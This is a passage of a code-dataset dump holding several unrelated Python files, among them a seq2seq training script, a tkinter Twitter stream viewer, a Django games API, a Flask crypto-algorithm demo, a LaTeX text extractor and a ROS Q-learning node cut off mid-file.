decoder, train_data, dev_data, test_data, test_data_text, n_iters, src_lang, tgt_lang, print_every=1000, plot_every=1000):\n start_time = time.time()\n parameters = [p for p in encoder.parameters()] + [p for p in decoder.parameters()]\n optimizer = optim.Adam(parameters)\n\n best_epoch = 0\n best_F = -1.\n for iter in range(1, n_iters+1):\n total_loss = 0.\n if args.debug:\n train_data = train_data[:2]\n for batch in tqdm(train_data, disable=not args.verbose):\n src, tgt = batch\n tgt = target_padding(tgt,len(tgt_lang.word2id))\n src = np.array([np.array(s, dtype=np.long) for s in src], dtype=np.long)\n tgt = np.array([np.array(s, dtype=np.long) for s in tgt], dtype=np.long)\n input_variable = Variable(torch.from_numpy(src))\n target_variable = Variable(torch.from_numpy(tgt))\n if use_cuda:\n input_variable = input_variable.cuda()\n target_variable = target_variable.cuda()\n loss = train(args, input_variable, target_variable, encoder, decoder, optimizer, tgt_lang)\n total_loss += loss\n print('epoch %d, total loss %.2f'%(iter,total_loss.cpu()[0]))\n precision, recall ,F = evaluate_all(args, dev_data, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=False)\n print('Precision %.3f, recall %.3f, F %.3f'%(precision*100, recall*100, F*100))\n sys.stdout.flush()\n \n if best_F < F:\n best_F = F\n best_epoch = iter\n torch.save(encoder.state_dict(),'models/'+args.log_dir+'_encoder.pt',pickle_protocol=3)\n torch.save(decoder.state_dict(),'models/'+args.log_dir+'_decoder.pt',pickle_protocol=3)\n encoder.load_state_dict(torch.load('models/'+args.log_dir+'_encoder.pt'))\n 
decoder.load_state_dict(torch.load('models/'+args.log_dir+'_decoder.pt'))\n\n precision, recall ,F = evaluate_all(args, dev_data, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=False)\n print('Precision %.3f, recall %.3f, F %.3f'%(precision*100, recall*100, F*100))\n test_precision, test_recall ,test_F = evaluate_all(args, test_data, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=False)\n text_precision, text_recall ,text_F = evaluate_all(args, test_data_text, encoder, decoder, src_lang=src_lang, tgt_lang=tgt_lang, from_text=True)\n print('test precision %.3f, recall %.3f, F value %.3f'%(test_precision*100, test_recall*100, test_F*100))\n print('text precision %.3f, recall %.3f, F value %.3f'%(text_precision*100, text_recall*100, text_F*100))\n sys.stdout.flush()\n\nif __name__ == '__main__':\n args = seq2seq_weak.parse_args()\n if use_cuda: torch.cuda.set_device(args.gpu)\n data, test_data_text, med_lang, cure_lang = pickle.load(open('../dataset/prescription_pairs_data.pkl','rb'))\n encoder = Encoder(voc_size=len(cure_lang.word2id), emb_size=args.emb_size, hidden_size=args.hidden_size, bidirectional=args.bidirectional)\n decoder = Decoder(args=args, voc_size=len(med_lang.word2id), hidden_size=args.hidden_size, emb_size=args.emb_size, bidirectional=args.bidirectional)\n encoder.load_emb(cure_lang.emb)\n if use_cuda:\n encoder.cuda()\n decoder.cuda()\n random.seed(255)\n random.shuffle(data)\n train_data = data[:int(len(data)*0.9)]\n dev_data = data[int(len(data)*0.9):int(len(data)*0.95)]\n test_data = data[int(len(data)*0.95):]\n batches = seq2seq_weak.make_batches(train_data, args.batch_size,med_lang)\n train_iters(args,encoder, decoder, batches, dev_data, test_data, test_data_text, args.epoch_num, tgt_lang=med_lang, src_lang=cure_lang)\n","sub_path":"multi_label.py","file_name":"multi_label.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"427094050","text":"from tweepy.streaming import StreamListener\r\nfrom tweepy import OAuthHandler\r\nfrom tweepy import Stream\r\nfrom tweepy import Cursor\r\nfrom tweepy import API\r\nimport conf\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport json\r\nimport tkinter as tk\r\nimport sys\r\nimport os\r\n#initialisations de nos variables\r\nTWITTER_COLOR = '#00acee'\r\nbuttonPressed = False\r\nnumTweets = 0#initialisation du nombre tweets\r\nelapsedTime = 0\r\nfinalTime = 0#initialisation\r\nseconds = 1\r\nyTweets = []\r\nxSeconds = []\r\ngraphfont = {'family': 'Lucida Console',\r\n 'color': TWITTER_COLOR,\r\n 'weight': 'normal',\r\n 'size': 16,\r\n }#definir le style d'interface\r\n\r\n#obtenir nos clés et nos jetons\r\nconsumer_key = conf.consumer_key\r\nconsumer_secret = conf.consumer_secret\r\naccess_token = conf.access_token\r\naccess_token_secret = conf.access_token_secret\r\n\r\nclass Client():#creation de client de l'API tweepy\r\n def __init__(self, user=None):\r\n self.auth = Authenticator().Authenticate()\r\n self.client = API(self.auth)\r\n self.user = user\r\n\r\n def getClient(self):\r\n return self.client\r\n\r\n\r\nclass Authenticator():\r\n def Authenticate(self):\r\n auth = OAuthHandler(consumer_key, consumer_secret) # créer un objet OAuthHandler\r\n auth.set_access_token(access_token, access_token_secret) # définir le jeton d'accès et le secret\r\n return auth\r\n\r\n\r\nclass TweetViewer():\r\n \"\"\"\r\n Proccess Live Tweets\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.authenticator = Authenticator()#crée une instance de la Class Authenticator\r\n\r\n def FetchTweets(self, filename, filter):\r\n listener = Listener(filename)#crée une instance de la Class Listener\r\n auth = self.authenticator.Authenticate()\r\n stream = Stream(auth, listener)\r\n global topics\r\n stream.filter(track=topics, is_async=True, languages=['en'])#la langue des tweets\r\n global buttonPressed\r\n if (buttonPressed == True):\r\n stream.filter.track\\\r\n = None\r\n stream.disconnect()\r\n stream = None\r\n # topics[0] = ''\r\n\r\n\r\nclass Listener(StreamListener):\r\n \"\"\"\r\n Prints tweet contents\r\n \"\"\"\r\n\r\n def __init__(self, filename):\r\n self.filename = filename\r\n\r\n def on_data(self, data):\r\n try:\r\n global buttonPressed\r\n if buttonPressed == False and len(topics) > 0:#on grade les memes valeurs des variable si on ne clique pas sur 'buttonPressed'\r\n global elapsedTime\r\n global finalTime\r\n global seconds\r\n global numTweets\r\n yTweets.append(numTweets)\r\n xSeconds.append((time.time() - elapsedTime))\r\n # seconds += seconds\r\n d = json.loads(data)\r\n # print(\"Topic is: \", topics, \"buttonPressed is: \", buttonPressed)\r\n formatted = convert65536('@' + d['user']['screen_name'] + \": \" + d['text'])\r\n text.insert(tk.END, formatted)\r\n text.insert(tk.END, \"\\n\\n\")\r\n text.see(tk.END)\r\n numTweets = numTweets + 1\r\n numTweetsLabel.configure(text=\"Tweets: {0}\".format(numTweets), bg='black', fg=TWITTER_COLOR, font=40)\r\n return True\r\n else:\r\n return True\r\n except BaseException as e:\r\n print(\"Error on_data: %s\" % str(e))\r\n # print(data)\r\n return True\r\n\r\n def on_error(self, status):#traitement d'erreur '420'\r\n if status == 420:\r\n return False\r\n print(status)\r\n return True\r\n\r\n\r\n# traitement des emojis et autres personnages non unicode qui peuvent apparaître dans les tweets\r\ndef convert65536(s): #######################################\r\n l = list(s); #\r\n i = 0; #\r\n while i < len(l): #\r\n o 
= ord(l[i]); # https://stackoverflow.com/a/28076205\r\n if o > 65535: #\r\n l[i] = \"{\" + str(o) + \"u}\"; #\r\n i += 1; #\r\n return \"\".join(l); ########################################\r\n\r\n\r\nfirstPress = True\r\n\r\n\r\ndef onButtonPress():\r\n global buttonPressed#mettre a jour les variable\r\n global Viewer\r\n global topics\r\n global file\r\n global elapsedTime\r\n global firstPress\r\n if firstPress == True:\r\n elapsedTime = time.time()#counter le temps passe pour touver et affiche les tweets\r\n firstPress = False\r\n buttonPressed = True\r\n topics.insert(0, TextBox.get())#\r\n topicsLabel.configure(text=\"Current Topics:\\n {0}\".format(printTopicsListVertical(topics)), bg='black',\r\n fg=TWITTER_COLOR, font=40, anchor='n', bd=10)#sauvegarder les mot clé utilisées\r\n\r\n if (len(topics) > 0):#afficher les tweets\r\n buttonPressed = False\r\n Viewer.FetchTweets(file, topics)#REcupérer le fichier json et afficher son contenue\r\n\r\n\r\n\r\ndef onResetButtonPress():#fonction pour remise a l'etat intial\r\n global finalTime\r\n global elapsedTime\r\n finalTime = time.time() - elapsedTime\r\n print(finalTime)\r\n\r\n global buttonPressed\r\n buttonPressed = True\r\n global numTweets\r\n numTweetsLabel.configure(text=\"Tweets: {0}\".format(numTweets))\r\n graph()\r\n numTweets = 0\r\n\r\n\r\ndef onExitButtonPress():#boutton quitter\r\n root.destroy()\r\n sys.exit(0)\r\n\r\n\r\ndef printTopicsList(topics):#zone de recherche\r\n if len(topics) == 1:\r\n return topics[0]\r\n\r\n s = \", \".join(topics)\r\n return s\r\n\r\n\r\ndef printTopicsListVertical(topics):#list de mot cle sauvgardé\r\n if len(topics) == 1:\r\n return topics[0]\r\n\r\n s = \"\\n\".join(topics)\r\n return s\r\n\r\n\r\ndef graph():#affiche le graph\r\n global elapsedTime\r\n global finalTime\r\n plt.xlabel('time (sec)', fontdict=graphfont)\r\n plt.ylabel('Tweets', fontdict=graphfont)\r\n plt.title('Number of Tweets about {0} over {1} seconds'.format(printTopicsList(topics), int(finalTime + 1.0)),\r\n fontdict=graphfont)\r\n plt.plot(xSeconds, yTweets, TWITTER_COLOR)\r\n plt.show()\r\n\r\n\r\ntopics = []\r\nfile = \"tweets.json\"#creation d'un fichier json\r\nViewer = TweetViewer()\r\n\r\nmyClient = Client()\r\napi = myClient.getClient()\r\ntweets = api.user_timeline(screen_name=\"realDonaldTrump\", count=10)\r\n\r\nmandotweets = []\r\nHEIGHT = 720\r\nWIDTH = 1280\r\n# appel de la fonction principale\r\nroot = tk.Tk()#créer un interface graphique\r\nroot.title(\"LiveTweets\")#titre de l'interface\r\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\r\ncanvas.pack() #Positionnement du widget avec la methode pack()\r\n\r\nbackground = tk.PhotoImage(file='background.png')#inserer image au fond\r\nbgLabel = tk.Label(root, image=background)\r\nbgLabel.place(relwidth=1, relheight=1)\r\n\r\nframe = tk.Frame(root, bg=TWITTER_COLOR, bd=5)\r\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.1, anchor='n')\r\n#affichage du texbox\r\nTextBox = tk.Entry(frame, bg='white', font=200)\r\nTextBox.bind(\"\", (lambda event: onButtonPress()))\r\nTextBox.place(relwidth=0.65, relheight=1)\r\n\r\nbutton = tk.Button(frame, text=\"Add Topic to Live Feed\", bg='#00acee', fg='white', font=40, command=onButtonPress)\r\nbutton.place(relx=0.6, relheight=1, relwidth=0.29)\r\n\r\nstopButton = tk.Button(frame, text=\"Graph Tweets/\\nStop Feed\", bg='#000080', fg='white', font=40,\r\n command=onResetButtonPress, borderwidth=3, relief=\"raised\")\r\nstopButton.place(relx=0.88, relheight=1, relwidth=0.12)\r\n\r\nexitButton = 
tk.Button(root, text=\"Exit\", bg=TWITTER_COLOR, fg='white', font=80, command=onExitButtonPress,\r\n borderwidth=3, relief=\"raised\")\r\nexitButton.place(relheight=0.1, relwidth=0.1, relx=0.45, rely=0.85)\r\n\r\nnumTweetsLabel = tk.Label(root, text=\"Tweets: {0}\".format(numTweets), borderwidth=3, relief=\"ridge\")\r\nnumTweetsLabel.configure(text=\"Tweets: {0}\".format(numTweets), bg='black', fg=TWITTER_COLOR, font=40)\r\nnumTweetsLabel.place(relheight=0.1, relwidth=0.15, relx=0.6, rely=0.85)\r\n\r\ntopicsLabel = tk.Label(root, text=\"Current Topics:\\n {0}\".format(printTopicsList(topics)), borderwidth=3,\r\n relief=\"ridge\")\r\ntopicsLabel.configure(text=\"Current Topics:\\n {0}\".format(printTopicsList(topics)), bg='black', fg=TWITTER_COLOR,\r\n font=40, anchor='n', bd=10)\r\ntopicsLabel.place(relheight=0.6, relwidth=0.12, relx=0.004, rely=0.25)\r\n\r\nframe2 = tk.Frame(root, bg=TWITTER_COLOR, bd=10)\r\nframe2.place(relx=0.5, rely=0.25, relwidth=0.75, relheight=0.6, anchor='n')\r\n\r\ntext = tk.Text(frame2)\r\ntext.config(state='normal')\r\ntext.config(font=(\"Lucida\"))\r\ntext.place(relwidth=1, relheight=1)\r\n\r\n# text.insert(tk.END, convert65536(str(TheTweets)))\r\nroot.mainloop()\r\n# END OF GUI LOOP","sub_path":"twitter2.py","file_name":"twitter2.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"276787964","text":"from rest_framework.parsers import JSONParser\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\nfrom games.models import Game\r\nfrom games.serializers import GameSerializer\r\nfrom datetime import datetime\r\nfrom django.utils import timezone\r\n\r\n@api_view(['GET', 'POST'])\r\ndef game_list(request):\r\n\r\n\tif request.method == 'GET':\r\n\r\n\t\tgames = Game.objects.all()\r\n\t\tgames_serializer = GameSerializer(games, many=True)\r\n\t\treturn Response(games_serializer.data)\r\n\r\n\telif request.method == 'POST':\r\n\r\n\t\tgame_serializer = GameSerializer(data=request.data)\r\n\t\tif game_serializer.is_valid(request):\r\n\t\t\tgame_serializer.save()\r\n\t\t\treturn Response(game_serializer.data, status=status.HTTP_201_CREATED)\r\n\t\treturn Response(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\ndef game_detail(request, pk):\r\n\r\n\ttry:\r\n\t\tgame = Game.objects.get(pk=pk)\r\n\texcept Game.DoesNotExist:\r\n\t\treturn Response(status=status.HTTP_404_NOT_FOUND)\r\n\t\r\n\tif request.method == 'GET':\r\n\r\n\t\tgame_serializer = GameSerializer(game)\r\n\t\treturn Response(game_serializer.data)\r\n\r\n\telif request.method == 'PUT':\r\n\r\n\t\tgame_serializer = GameSerializer(game, data=request.data)\r\n\r\n\t\tif game_serializer.is_valid(request):\r\n\t\t\tgame_serializer.save()\r\n\t\t\treturn Response(game_serializer.data)\r\n\r\n\t\treturn Response(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\telif request.method == 'DELETE':\r\n\r\n\t\ttodays_date = timezone.make_aware(datetime.now(), timezone.get_current_timezone())\r\n\r\n\t\tif todays_date < game.release_date:\r\n\t\t\tgame.delete()\r\n\t\t\treturn Response(status=status.HTTP_204_NO_CONTENT)\r\n\t\telse:\r\n\t\t\treturn Response({\"msg\" : \"This game was launched already!\"}, status=status.HTTP_412_PRECONDITION_FAILED)\r\n\r\n\r\n\r\n\r\n","sub_path":"gamesapi/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"207409103","text":"from flask import Flask, render_template, request\nfrom Crypto_Examples.DES import run_des\nfrom Crypto_Examples.AES import AES\nfrom Crypto_Examples.RSA import RSA\nfrom Crypto_Examples.MD5 import MD5\n\napp = Flask(__name__, template_folder='templates', static_folder='static')\n\n\ndef is_hex(string):\n \"\"\"Check if entered value is hex:\"\"\"\n try:\n int(string, 16)\n return True\n except ValueError:\n return False\n\n\n\ndef get_hex(text):\n \"\"\"Get hex value from entered string\"\"\"\n text_byte_array = list(map(bin, bytearray(text, encoding='utf-8')))\n text_byte_array_string = ''.join([foo[2:] for foo in text_byte_array])\n return str(hex(int(text_byte_array_string, 2))[2:].upper())\n\n\ndef get_hex_array(string):\n return [int(string[i:i + 2], 16) for i in range(0, len(string), 2)]\n\n\ndef fixed_len_hex(string):\n return '{0:#034x}'.format(int(string, 16))[2:]\n\n\n@app.route('/')\ndef load_home_page():\n \"\"\"Display Home page:\"\"\"\n return render_template('index.html')\n\n\n@app.route('/des/', methods=['POST', 'GET'])\ndef des_page():\n \"\"\"Display data from DES calculations:\"\"\"\n if request.method == 'POST':\n message = request.form['message']\n key = request.form['key']\n\n # Errors:\n # 1 - empty message or key field\n # 2- key is not hex value\n\n if message or key is not None:\n\n if not is_hex(key):\n return render_template('page_des.html', error_no='2')\n else:\n errors = list()\n if not is_hex(message):\n message = get_hex(message)\n errors.append('Message was not hex so it was converted to hex value which is: {}'.format(message))\n if len(key) > 16:\n key = key[:16]\n errors.append('Key was longer than 16 symbols, it was shortened to: {}'.format(key))\n # Check if there are errors:\n errors = None if len(errors) == 0 else errors\n action = request.form['action_options']\n print(action)\n if action == 'encrypt':\n encryption_values = run_des(message, key, action)\n return render_template('page_des.html',\n print_action=action,\n message=message,\n key=key,\n encryption_values=encryption_values,\n errors=errors)\n elif action == 'decrypt':\n decryption_values = run_des(message, key, action)\n return render_template('page_des.html',\n print_action=action,\n message=message,\n key=key,\n decryption_values=decryption_values,\n errors=errors)\n else:\n encryption_values = run_des(message, key, 'encrypt')\n decryption_values = run_des(encryption_values['Cipher'], key, 'decrypt')\n return render_template('page_des.html',\n print_action='both',\n message=message,\n key=key,\n encryption_values=encryption_values,\n decryption_values=decryption_values,\n errors=errors)\n else:\n return render_template('page_des.html', error_no='1')\n else:\n return render_template('page_des.html')\n\n\n\n@app.route('/aes/', methods=['POST', 'GET'])\ndef aes_page():\n \"\"\"Display data from AES calculations:\"\"\"\n if request.method == 'POST':\n message = request.form['message']\n key = request.form['key']\n\n # Errors:\n # 1 - empty message or key field\n # 2 - key is not hex value\n # 3 - message is not hex value\n\n if message or key is not None:\n\n if not is_hex(key):\n return render_template('page_aes.html', error_no='2')\n elif not is_hex(message):\n return render_template('page_aes.html', error_no='3')\n else:\n message = fixed_len_hex(message)\n key = fixed_len_hex(key)\n aes = AES()\n aes_data = aes.do_rounds(message=get_hex_array(message), key=get_hex_array(key))\n return render_template('page_aes.html', message=message, key=key, 
data=aes_data)\n else:\n return render_template('page_aes.html', error_no='1')\n else:\n return render_template('page_aes.html')\n\n\n\n@app.route('/rsa/', methods=['POST', 'GET'])\ndef rsa_page():\n \"\"\"Display data from DES calculations:\"\"\"\n if request.method == 'POST':\n message = int(request.form['message'])\n e = int(request.form['e'])\n p = int(request.form['p'])\n q = int(request.form['q'])\n\n # Errors:\n # 1 - empty value\n # 2 - numbers are not prime\n # 3 - e is not relatively prime to (p-1)*(q-1)\n\n if message and e and p and q is not None:\n rsa = RSA()\n # Check for primeness and relative primeness:\n if not rsa.is_prime(p): # is_hex(e):\n return render_template('page_rsa.html', error_no='2', number=p)\n elif not rsa.is_prime(q):\n return render_template('page_rsa.html', error_no='2', number=q)\n else:\n if not rsa.is_relatively_prime(e, (p - 1) * (q - 1)):\n return render_template('page_rsa.html', error_no='3', number=e)\n else:\n action = request.form['action_options']\n print(action)\n\n return render_template('page_rsa.html', message=message, p=p, q=q, e=e,\n rsa=rsa.do_rsa(message, p, q, e, action))\n else:\n return render_template('page_rsa.html', error_no='1')\n else:\n return render_template('page_rsa.html')\n\n\n@app.route('/md5/', methods=['POST', 'GET'])\ndef md5_page():\n if request.method == 'POST':\n message = request.form['message']\n action = request.form['action_options']\n\n # Errors:\n # 1 - empty value\n\n # if message is not None:\n hash = MD5().get_md5_hash(message)\n if action == 'all_steps':\n return render_template('page_md5.html', message=message, hash=hash['hash'], show_all=True,\n operations_data=hash)\n else:\n return render_template('page_md5.html', message=message, hash=hash['hash'])\n\n # else:\n # return render_template('page_md5.html', error_no='1')\n else:\n return render_template('page_md5.html')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"519214128","text":"\"\"\"\nThis script is to set up the fingerprints database. In details,\n1. download word samples from internet.\n2. calculate the fingerprints of each sample and insert them into db.\n\"\"\"\n\nimport urllib.request\nimport sys\nfrom audio_fingerprinting import insert_file\n\nsamples = [\n\t'audio',\n\t'impossible',\n\t'you'\n]\n\nwav_folder_name = 'audio_samples/wav/'\nmp3_folder_name = 'audio_samples/mp3/'\n\nif len(sys.argv) < 2:\n\tprint('Usage:')\n\tprint('1. Download mp3 file')\n\tprint(' python setup.py --download')\n\tprint('2. Insert the converted wav files in to db')\n\tprint(' python setup.py --insert')\n\t\nelif sys.argv[1] == '--download':\n\tfor word in samples:\n\t\tfn = word+'.mp3'\n\t\turl = 'https://ssl.gstatic.com/dictionary/static/sounds/de/0/'+fn\n\t\turllib.request.urlretrieve(url, mp3_folder_name + fn)\n\nelif sys.argv[1] == '--insert':\n\tfor word in samples:\n\t\tfn = word + '.wav'\n\t\tpn = wav_folder_name + fn\n\t\tinsert_file(pn, word)\n\nelse:\n\tprint('Usage:')\n\tprint('1. Download mp3 file')\n\tprint(' python setup.py --download')\n\tprint('2. Insert the converted wav files in to db')\n\tprint(' python setup.py --insert')\n\t\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"84748747","text":"'''\ninheritance\n'''\n# class introduce:\n\n# def say_hello(self):\n# print('hello, ')\n\n# class occupation(introduce):\n# def __init__(self,name , occu):\n# self.occu = occu\n# self.name = name\n \n# def say_occu(self):\n# print('My name is {}, Im {}.'.format(self.name, self.occu))\n\n# son = occupation('Son', 'Graduate Student')\n# son.say_hello()\n# son.say_occu()\n\n\n'''\noverride\n'''\n# class Country:\n# \"\"\"Super Class\"\"\"\n\n# name = '국가명'\n# population = '인구'\n# capital = '수도'\n\n# def show(self):\n# print('국가 클래스의 메소드입니다.')\n\n# class Korea(Country):\n# \"\"\"Sub Class\"\"\"\n\n# def __init__(self, name,population, capital):\n# self.name = name\n# self.population = population\n# self.capital = capital\n\n# def show(self):\n# super().show()\n# print(\n# \"\"\"\n# 국가의 이름은 {} 입니다.\n# 국가의 인구는 {} 입니다.\n# 국가의 수도는 {} 입니다.\n# \"\"\".format(self.name, self.population, self.capital)\n# )\n\n# Kor = Korea(\"대한민국\", \"5,182만1669명\", \"서울\")\n# Kor.show()\n\nclass Parent:\n def __init__(self, p1, p2):\n self.p1 = p1\n self.p2 = p2\n \nclass Child(Parent):\n def __init__(self, c1, **kwargs):\n super(Child, self).__init__(**kwargs) # super()를 사용하지 않으면 Parent의 __init__가 overriding 됩니다.\n self.c1 = c1\n self.c2 = \"This is Child's c2\"\n self.c3 = \"This is Child's c3\"\n\nchild = Child(p1=\"This is Parent's p1\", \n\t p2=\"This is Parent's p1\", \n c1=\"This is Child's c1\")\n\nprint(child.p1)\nprint(child.p2)\nprint(child.c1)\nprint(child.c2)\nprint(child.c3)","sub_path":"for_testing/heritance_override_super.py","file_name":"heritance_override_super.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"275362228","text":"import re\n\nblack_list = [\n\t\"\\\\documentclass\",\n\t\"\\\\usepackage\",\n\t\"\\\\title\",\n\t\"\\\\date\",\n\t\"\\\\begin{document}\",\n\t\"\\\\def\",\n\t\"\\\\newcommand\",\n\t\"\\\\tableofcontents\",\n\t\"\\\\end{document}\",\n\t\"\\\\begin{center}\",\n\t\"\\\\end{center}\",\n\t\"\\\\begin{flushright}\",\n\t\"\\\\end{flushright}\",\n\t\"\\\\vspace{30pt}\",\n\t\"\\\\vfill\",\n\t\"\\\\begin{itemize}\",\n\t\"\\\\end{itemize}\",\n\t\"\\\\bibliographystyle\",\n\t\"\\\\begin{thebibliography}\",\n\t\"\\\\bibitem\",\n\t\"\\\\end{thebibliography}\",\n\t\"\\\\newpage\",\n\t\"\\\\medskip\",\n\t\"\\\\vspace\",\n\t\"\\\\par\",\n\t\"\\\\bigskip\",\n\t\"\\\\addcontentsline\",\n\t\"%\"\n]\n\np1 = re.compile(\"input{(\\w+)}\")\np_refine = [\n\tre.compile(\"\\s*bf\\s*(.*)\\s*}\"),\n\tre.compile(\"item(.*)\"),\n\tre.compile(\"chapter{(.*)}\"),\n\tre.compile(\"section{(.*)}\"),\n\tre.compile(\"subsection{(.*)}\")\n]\n\ndef ok(line):\n\tfor bl in black_list:\n\t\tif line.startswith(bl):\n\t\t\treturn False\n\treturn True\n\ndef refine(line):\n\tresult = line\n\tr = False\n\tfor p in p_refine:\n\t\ts = p.search(result)\n\t\tif s != None:\n\t\t\tresult = s.group(1)\n\t\t\tr = True\n\tif r:\n\t\tresult += \"\\n\"\n\treturn result\n\ndef read_file(file_name):\n\tf = open(file_name, \"r\")\n\ttext = \"\"\n\tstatus = True\n\tfor line in f:\n\t\tif line.startswith(\"\\\\iffalse\"):\n\t\t\tstatus = False\n\t\telif line.startswith(\"\\\\fi\"):\n\t\t\tstatus = True\n\t\telse:\n\t\t\tif not status:\n\t\t\t\tcontinue\n\t\t\twhile (len(line) > 0) and (line[0] == \" \" or line[0] == \"\\t\"):\n\t\t\t\tline = line[1:]\n\t\t\tif line.startswith(\"\\\\input\"):\n\t\t\t\tm = p1.search(line)\n\t\t\t\tinput_file = m.group(1) + \".tex\"\n\t\t\t\tprint(input_file)\n\t\t\t\ttext += read_file(input_file)\n\t\t\telif ok(line):\n\t\t\t\ttext += refine(line)\n\tf.close()\n\treturn text\n\ndef write_file(file_name, text):\n\tf = open(file_name, \"wt\", encoding = \"utf-8\")\n\tf.write(text)\n\tf.close()\n\ndef process():\n\ttext = read_file(\"Abstract.tex\")\n\twrite_file(\"Abstract.txt\", text)\n\ndef test():\n\tp = re.compile(\"subsection{(.*)}\")\n\tr = p.search(\"subsection{Статистический метод TF-IDF}\")\n\tprint(r)\n\n#test()\nprocess()\n\n","sub_path":"LaTex/PhD/05.13.01/Abstract/Abstract.py","file_name":"Abstract.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"426994737","text":"#!/usr/bin/env python3\n\nimport rospy\nimport numpy as np\nimport os\nimport csv\nimport time\nfrom random import choice, randint\nfrom q_learning_project.msg import QMatrix, QMatrixRow\nfrom q_learning_project.msg import QLearningReward\nfrom q_learning_project.msg import RobotMoveDBToBlock\n\n# Path of directory on where this file is located\npath_prefix = os.path.dirname(__file__) + \"/action_states/\"\nt0 = time.time()\n\nclass QLearning(object):\n def __init__(self):\n # Initialize this node\n rospy.init_node(\"q_learning\")\n rospy.sleep(1)\n\n # Fetch pre-built action matrix. This is a 2d numpy array where row indexes\n # correspond to the starting state and column indexes are the next states.\n #\n # A value of -1 indicates that it is not possible to get to the next state\n # from the starting state. Values 0-9 correspond to what action is needed\n # to go to the next state.\n #\n # e.g. self.action_matrix[0][12] = 5\n self.action_matrix = np.loadtxt(path_prefix + \"action_matrix.txt\")\n\n # Fetch actions. These are the only 9 possible actions the system can take.\n # self.actions is an array of dictionaries where the row index corresponds\n # to the action number, and the value has the following form:\n # { dumbbell: \"red\", block: 1}\n colors = [\"red\", \"green\", \"blue\"]\n self.actions = np.loadtxt(path_prefix + \"actions.txt\")\n self.actions = list(map(\n lambda x: {\"dumbbell\": colors[int(x[0])], \"block\": int(x[1])},\n self.actions\n ))\n\n # Fetch states. There are 64 states. Each row index corresponds to the\n # state number, and the value is a list of 3 items indicating the positions\n # of the red, green, blue dumbbells respectively.\n # e.g. [[0, 0, 0], [1, 0 , 0], [2, 0, 0], ..., [3, 3, 3]]\n # e.g. [0, 1, 2] indicates that the green dumbbell is at block 1, and blue at block 2.\n # A value of 0 corresponds to the origin. 
1/2/3 corresponds to the block number.\n # Note that not all states are possible to get to.\n self.states = np.loadtxt(path_prefix + \"states.txt\")\n self.states = list(map(lambda x: list(map(lambda y: int(y), x)), self.states))\n\n # Initialize Q matrix\n self.qmatrix = QMatrix()\n self.qmatrix.q_matrix = [QMatrixRow(q_matrix_row = [0 for action in range(9)]) for state in range(64)]\n \n # publisher for QMatrix\n self.qmatrix_pub = rospy.Publisher(\"/q_learning/q_matrix\", QMatrix, queue_size=10)\n\n # subscribe to reward\n rospy.Subscriber(\"/q_learning/reward\", QLearningReward, self.update_q_matrix)\n rospy.sleep(1)\n\n # publisher for robot action\n self.robot_action_pub = rospy.Publisher(\"/q_learning/robot_action\", RobotMoveDBToBlock, queue_size=10)\n rospy.sleep(1)\n\n # initialize RobotMoveDBToBlock message\n self.robot_action = RobotMoveDBToBlock()\n\n # action performed at time t\n self.action = None\n\n # state at time t, initialized to the original state\n self.state = 0\n # state at time t+1\n self.next_state = None\n\n # learning rate\n self.alpha = 1\n # discount factor\n self.gamma = 0.8\n # count how long the values of the Q matrix have stayed the same\n self.convergence_cnt = 0\n \n self.reward_received = True\n self.converged = False\n\n def perform_action(self): \n # wait until a reward is received\n if not self.reward_received:\n rospy.sleep(1)\n return\n\n # randomly select a valid action \n valid_actions = [x for x in self.action_matrix[self.state] if x > -1]\n\n # if there are no valid actions, return and wait for the world to be reset\n if not valid_actions:\n # reset everything to the original state\n self.state = 0\n self.next_state = None\n self.action = None\n self.reward_received = True\n return\n\n action = choice(valid_actions)\n \n # update action at time t\n self.action = int(action)\n\n # update state at time t+1\n self.next_state = np.where(self.action_matrix[self.state] == action)[0][0]\n\n # perform action\n action = self.actions[self.action]\n self.robot_action.robot_db = action.get(\"dumbbell\")\n self.robot_action.block_id = action.get(\"block\")\n self.robot_action_pub.publish(self.robot_action)\n #print(action)\n\n self.reward_received = False\n return\n \n def update_q_matrix(self, data):\n self.reward_received = True\n\n # get current Q value given state and action\n q = self.qmatrix.q_matrix[self.state].q_matrix_row[self.action]\n\n # find the maximum q value for the next state\n max_q = max(self.qmatrix.q_matrix[self.next_state].q_matrix_row)\n\n # calculate new Q value\n q_new = int(q + self.alpha*(data.reward + self.gamma*max_q - q))\n self.qmatrix.q_matrix[self.state].q_matrix_row[self.action] = q_new\n #print(q + self.alpha*(data.reward + self.gamma*max_q - q_t))\n # update current state\n self.state = self.next_state\n\n # publish Q matrix\n self.qmatrix_pub.publish(self.qmatrix)\n\n # check if the Q matrix has converged \n if q == q_new:\n self.convergence_cnt += 1\n 